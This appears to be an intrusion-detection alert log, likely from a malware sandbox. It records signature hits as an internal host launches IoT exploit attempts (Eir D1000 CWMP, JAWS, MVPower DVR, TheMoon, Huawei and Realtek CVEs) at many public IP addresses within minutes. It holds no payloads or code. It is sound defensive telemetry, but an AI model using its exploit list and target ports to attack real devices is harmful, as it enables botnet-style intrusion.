Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 118.34.87.46

Timestamp:	03/18/24-10:00:09.491208
SID:	2023548
Source Port:	46302
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 66.248.208.217

Timestamp:	03/18/24-09:59:56.964346
SID:	2023548
Source Port:	35820
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.192.181.204

Timestamp:	03/18/24-09:57:05.948763
SID:	2030092
Source Port:	42270
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 4.208.29.15

Timestamp:	03/18/24-09:57:05.776909
SID:	2030092
Source Port:	34490
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 69.71.118.13

Timestamp:	03/18/24-10:00:03.759532
SID:	2030092
Source Port:	38474
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 159.0.214.4

Timestamp:	03/18/24-09:59:09.950546
SID:	2023548
Source Port:	56744
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 201.94.222.116

Timestamp:	03/18/24-10:00:21.503562
SID:	2023548
Source Port:	56768
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 94.49.205.172

Timestamp:	03/18/24-10:00:01.461814
SID:	2023548
Source Port:	58310
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 211.33.200.176

Timestamp:	03/18/24-09:59:01.678005
SID:	2023548
Source Port:	43764
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 35.244.193.5

Timestamp:	03/18/24-09:59:48.203186
SID:	2023548
Source Port:	55544
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 5.167.74.32

Timestamp:	03/18/24-09:58:52.847293
SID:	2023548
Source Port:	40622
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.241.27.215

Timestamp:	03/18/24-09:59:39.821279
SID:	2023548
Source Port:	54554
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 103.12.149.159

Timestamp:	03/18/24-09:59:15.555894
SID:	2025883
Source Port:	60008
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 150.95.159.115

Timestamp:	03/18/24-09:57:05.893615
SID:	2025883
Source Port:	54494
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 212.33.198.66

Timestamp:	03/18/24-09:57:06.143242
SID:	2025883
Source Port:	47700
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 67.6.90.92

Timestamp:	03/18/24-09:58:16.213263
SID:	2023548
Source Port:	41154
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 75.103.88.248

Timestamp:	03/18/24-09:58:31.121595
SID:	2030092
Source Port:	34182
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.157.56

Timestamp:	03/18/24-09:59:49.035028
SID:	2018132
Source Port:	55090
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 146.20.182.220

Timestamp:	03/18/24-09:59:47.221642
SID:	2025576
Source Port:	52952
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 39.111.17.106

Timestamp:	03/18/24-09:58:53.912269
SID:	2023548
Source Port:	42076
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.236.36

Timestamp:	03/18/24-09:56:56.785944
SID:	2018132
Source Port:	58700
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 111.84.208.52

Timestamp:	03/18/24-09:59:11.434928
SID:	2025576
Source Port:	33866
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 191.255.78.196

Timestamp:	03/18/24-10:00:21.753839
SID:	2023548
Source Port:	35392
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 54.233.65.49

Timestamp:	03/18/24-10:00:10.210958
SID:	2025883
Source Port:	46450
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 24.209.67.252

Timestamp:	03/18/24-09:58:51.302391
SID:	2023548
Source Port:	37772
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.213.109.77

Timestamp:	03/18/24-09:59:41.753558
SID:	2025883
Source Port:	54954
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.76.78.133

Timestamp:	03/18/24-09:58:22.242237
SID:	2023548
Source Port:	56090
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.228.141.94

Timestamp:	03/18/24-09:58:45.881840
SID:	2030092
Source Port:	36608
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 34.196.197.185

Timestamp:	03/18/24-09:59:06.008896
SID:	2025576
Source Port:	43124
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.200.53

Timestamp:	03/18/24-09:58:49.490435
SID:	2018132
Source Port:	44004
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.245.72.19

Timestamp:	03/18/24-09:59:37.246238
SID:	2018132
Source Port:	53550
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.130.105

Timestamp:	03/18/24-09:57:05.345859
SID:	2018132
Source Port:	36800
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 218.232.104.134

Timestamp:	03/18/24-09:59:00.223280
SID:	2030092
Source Port:	55208
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 69.164.46.87

Timestamp:	03/18/24-09:58:51.796154
SID:	2025883
Source Port:	56518
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 86.164.87.45

Timestamp:	03/18/24-09:59:55.875026
SID:	2023548
Source Port:	35048
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 59.47.238.253

Timestamp:	03/18/24-09:59:26.421027
SID:	2025576
Source Port:	52306
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 84.75.253.96

Timestamp:	03/18/24-09:58:33.062956
SID:	2023548
Source Port:	49322
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.64.121.6

Timestamp:	03/18/24-09:59:19.139310
SID:	2025883
Source Port:	33490
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 115.7.75.39

Timestamp:	03/18/24-09:57:08.082270
SID:	2023548
Source Port:	48926
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 125.147.124.167

Timestamp:	03/18/24-10:00:05.946064
SID:	2023548
Source Port:	34868
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 85.10.196.214

Timestamp:	03/18/24-09:59:41.936655
SID:	2025883
Source Port:	51914
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 40.76.156.8

Timestamp:	03/18/24-09:56:59.880834
SID:	2030092
Source Port:	35822
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.247.22.223

Timestamp:	03/18/24-10:00:09.061264
SID:	2023548
Source Port:	47732
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 156.77.135.134

Timestamp:	03/18/24-09:58:48.532590
SID:	2835222
Source Port:	48196
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 201.163.120.253

Timestamp:	03/18/24-10:00:11.743493
SID:	2025576
Source Port:	47360
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 62.133.168.21

Timestamp:	03/18/24-10:00:15.122936
SID:	2025576
Source Port:	48386
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.234.248

Timestamp:	03/18/24-09:59:26.018813
SID:	2018132
Source Port:	48728
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.97.229.239

Timestamp:	03/18/24-09:58:59.223435
SID:	2018132
Source Port:	58838
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.214.195.31

Timestamp:	03/18/24-10:00:06.480426
SID:	2025576
Source Port:	60784
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 115.9.78.124

Timestamp:	03/18/24-09:58:50.311290
SID:	2023548
Source Port:	56344
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 44.202.167.15

Timestamp:	03/18/24-09:57:04.748375
SID:	2025576
Source Port:	47588
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 103.251.168.124

Timestamp:	03/18/24-09:58:47.614213
SID:	2025883
Source Port:	56372
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 104.66.73.239

Timestamp:	03/18/24-09:59:31.336202
SID:	2025883
Source Port:	34326
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 187.121.71.41

Timestamp:	03/18/24-09:58:22.403177
SID:	2023548
Source Port:	36362
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 208.106.214.3

Timestamp:	03/18/24-10:00:14.757706
SID:	2030092
Source Port:	48674
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 98.98.203.9

Timestamp:	03/18/24-09:58:29.183744
SID:	2018132
Source Port:	35828
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 186.121.40.184

Timestamp:	03/18/24-09:59:33.306890
SID:	2023548
Source Port:	49338
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 82.172.181.47

Timestamp:	03/18/24-09:59:48.289833
SID:	2023548
Source Port:	54684
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.104.127

Timestamp:	03/18/24-09:59:32.979171
SID:	2018132
Source Port:	37276
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 116.75.228.172

Timestamp:	03/18/24-09:58:53.043598
SID:	2023548
Source Port:	58536
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.235.204.108

Timestamp:	03/18/24-09:59:49.343977
SID:	2023548
Source Port:	42298
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 72.211.5.73

Timestamp:	03/18/24-10:00:00.588694
SID:	2023548
Source Port:	40412
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 171.33.128.234

Timestamp:	03/18/24-09:58:12.067970
SID:	2025883
Source Port:	34520
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 204.117.211.14

Timestamp:	03/18/24-10:00:13.512057
SID:	2030092
Source Port:	50532
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 52.42.65.252

Timestamp:	03/18/24-09:58:13.297647
SID:	2025576
Source Port:	56822
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 86.190.64.140

Timestamp:	03/18/24-09:59:23.360997
SID:	2023548
Source Port:	46740
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 211.248.51.114

Timestamp:	03/18/24-09:59:35.449689
SID:	2023548
Source Port:	55766
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 185.183.243.22

Timestamp:	03/18/24-09:59:25.976908
SID:	2030092
Source Port:	55596
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 189.163.195.6

Timestamp:	03/18/24-09:59:41.878562
SID:	2025576
Source Port:	44130
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 35.168.137.77

Timestamp:	03/18/24-09:59:26.202559
SID:	2025576
Source Port:	59756
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 188.29.100.105

Timestamp:	03/18/24-09:59:02.337795
SID:	2023548
Source Port:	56664
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 222.102.108.150

Timestamp:	03/18/24-09:59:17.136259
SID:	2023548
Source Port:	51718
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 177.93.200.19

Timestamp:	03/18/24-10:00:11.041010
SID:	2030092
Source Port:	59050
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.22.71

Timestamp:	03/18/24-09:58:54.706829
SID:	2018132
Source Port:	38298
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 184.151.192.120

Timestamp:	03/18/24-09:58:14.748993
SID:	2018132
Source Port:	40290
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 38.91.50.181

Timestamp:	03/18/24-09:57:08.059454
SID:	2023548
Source Port:	44140
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 50.35.39.33

Timestamp:	03/18/24-09:58:41.923087
SID:	2023548
Source Port:	42440
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 59.183.111.147

Timestamp:	03/18/24-09:58:53.902371
SID:	2025576
Source Port:	41778
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 89.161.153.7

Timestamp:	03/18/24-09:58:57.122705
SID:	2030092
Source Port:	42828
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 63.32.154.23

Timestamp:	03/18/24-09:59:57.135033
SID:	2025883
Source Port:	54452
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 129.208.149.252

Timestamp:	03/18/24-09:58:12.850189
SID:	2023548
Source Port:	36586
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 164.155.147.120

Timestamp:	03/18/24-09:58:29.071531
SID:	2023548
Source Port:	50940
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 34.195.221.78

Timestamp:	03/18/24-09:59:37.464227
SID:	2025576
Source Port:	55896
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 191.61.67.2

Timestamp:	03/18/24-09:59:00.165129
SID:	2027339
Source Port:	34378
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 64.225.3.109

Timestamp:	03/18/24-09:58:11.806396
SID:	2030092
Source Port:	47126
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.231.124.166

Timestamp:	03/18/24-09:58:56.089759
SID:	2025883
Source Port:	55344
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 211.226.82.70

Timestamp:	03/18/24-09:57:08.564402
SID:	2023548
Source Port:	46308
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 128.199.249.92

Timestamp:	03/18/24-09:57:00.622151
SID:	2025576
Source Port:	33070
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 65.131.199.42

Timestamp:	03/18/24-09:58:22.235678
SID:	2023548
Source Port:	43138
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 67.1.131.119

Timestamp:	03/18/24-09:58:24.242529
SID:	2023548
Source Port:	44720
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 159.0.214.4

Timestamp:	03/18/24-09:59:10.183943
SID:	2023548
Source Port:	56820
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 222.156.237.113

Timestamp:	03/18/24-09:59:06.388175
SID:	2025576
Source Port:	51500
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 13.110.114.118

Timestamp:	03/18/24-09:58:50.837080
SID:	2030092
Source Port:	35958
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 76.12.139.97

Timestamp:	03/18/24-09:56:59.979274
SID:	2025883
Source Port:	53174
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.75.156

Timestamp:	03/18/24-09:58:33.224033
SID:	2018132
Source Port:	33514
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 197.165.225.76

Timestamp:	03/18/24-09:59:13.836477
SID:	2030092
Source Port:	47474
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.60.45.123

Timestamp:	03/18/24-09:58:15.489971
SID:	2023548
Source Port:	44490
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 177.93.200.19

Timestamp:	03/18/24-10:00:11.041010
SID:	2025883
Source Port:	59050
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 62.27.37.234

Timestamp:	03/18/24-10:00:20.349425
SID:	2030092
Source Port:	49184
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 27.236.106.122

Timestamp:	03/18/24-09:59:48.413705
SID:	2023548
Source Port:	49536
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 123.240.201.73

Timestamp:	03/18/24-09:58:29.987838
SID:	2030092
Source Port:	39348
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.33.235.147

Timestamp:	03/18/24-09:59:06.073690
SID:	2025576
Source Port:	48216
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 201.229.223.123

Timestamp:	03/18/24-09:59:41.586370
SID:	2030092
Source Port:	57974
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 196.235.233.150

Timestamp:	03/18/24-09:58:32.311077
SID:	2023548
Source Port:	56728
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 152.250.125.113

Timestamp:	03/18/24-09:59:06.465361
SID:	2023548
Source Port:	51210
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.53.72

Timestamp:	03/18/24-10:00:18.505878
SID:	2018132
Source Port:	46114
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 5.133.210.182

Timestamp:	03/18/24-09:59:52.842164
SID:	2025576
Source Port:	58204
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 52.44.221.162

Timestamp:	03/18/24-10:00:02.810743
SID:	2030092
Source Port:	46628
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.253.28.198

Timestamp:	03/18/24-09:59:19.277326
SID:	2018132
Source Port:	42188
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.231.124.166

Timestamp:	03/18/24-09:58:56.089759
SID:	2030092
Source Port:	55344
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 64.225.3.109

Timestamp:	03/18/24-09:58:11.806396
SID:	2025883
Source Port:	47126
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 61.108.147.225

